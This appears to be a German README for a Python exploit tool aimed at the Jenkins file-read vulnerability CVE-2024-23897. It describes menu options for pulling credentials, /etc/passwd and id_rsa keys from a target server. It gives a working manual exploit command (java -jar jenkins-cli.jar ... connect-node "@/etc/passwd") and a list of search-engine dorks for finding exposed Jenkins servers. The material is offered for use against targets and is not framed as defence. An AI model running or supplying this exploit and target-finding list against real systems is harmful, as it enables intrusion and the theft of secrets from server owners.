
Ein in Python geschriebenes Skript zur Automatisierung der Schwachstelle CVE-2024-23897
Betroffene Versionen:
Ein in Python geschriebenes Skript zur Automatisierung der Schwachstelle CVE-2024-23897 🤖 🛠️
Dieser Python-Code stellt einen Scanner für eine spezifische Schwachstelle (CVE-2024-23897) in Jenkins-Servern dar. Er beginnt damit, den Benutzer nach der URL des Jenkins-Servers zu fragen.
Dann bietet er die Option, die Datei "jenkins-cli.jar" herunterzuladen, die für die Interaktion mit Jenkins über die Befehlszeile erforderlich ist. Danach präsentiert er ein Menü mit Optionen, die das Ausführen von Befehlen wie das Abrufen von Serverinformationen, Umgebungsinformationen, Jenkins-Konfigurationsinformationen, Benutzerinformationen, Anmeldeinformationen sowie das Lesen sensibler Dateien wie "/etc/passwd", "/etc/os-release" und "id_rsa" umfassen.
Sobald eine Option aus dem Menü ausgewählt wird, wird der entsprechende Befehl auf dem angegebenen Jenkins-Server ausgeführt. Der Code ist mit Funktionen zum Herunterladen der Datei und zum Ausführen der Befehle strukturiert, sowie einer Hauptfunktion zur Steuerung des Programmablaufs.
Ausführung für Jenkins-Server 📝:
python3 CVE-2024-23897-A-scaner.py
Ausführung für Jenkins-Server IN DOCKER 📝:
python3 CVE-2024-23897-B-DOCKER-scaner.py
---------------------------------------------------------------------------------------------------------------------------------
Manuelle Ausführung.
1- herunterladen jenkins-cli.jar : http:///jnlpJars/jenkins-cli.jar
2- um LFI durchzuführen, ausführen: java -jar jenkins-cli.jar -s http://172.17.0.2:8080/ -http connect-node "@/etc/passwd"
dork list:
intitle:"Dashboard [Jenkins]" inurl:"/login"
intitle:"Jenkins" "Dashboard"
inurl:"/computer/" intitle:"Jenkins"
inurl:"/script" intitle:"Jenkins"
"Jenkins [Jenkins]" intitle:"Login"
intitle:"Jenkins" "Jenkins ver. 2.441"
inurl:"/manage" intitle:"Jenkins"
site:.com intitle:"Jenkins"
site:aws.amazon.com intitle:"Jenkins"
filetype:xml inurl:"jenkins/config.xml"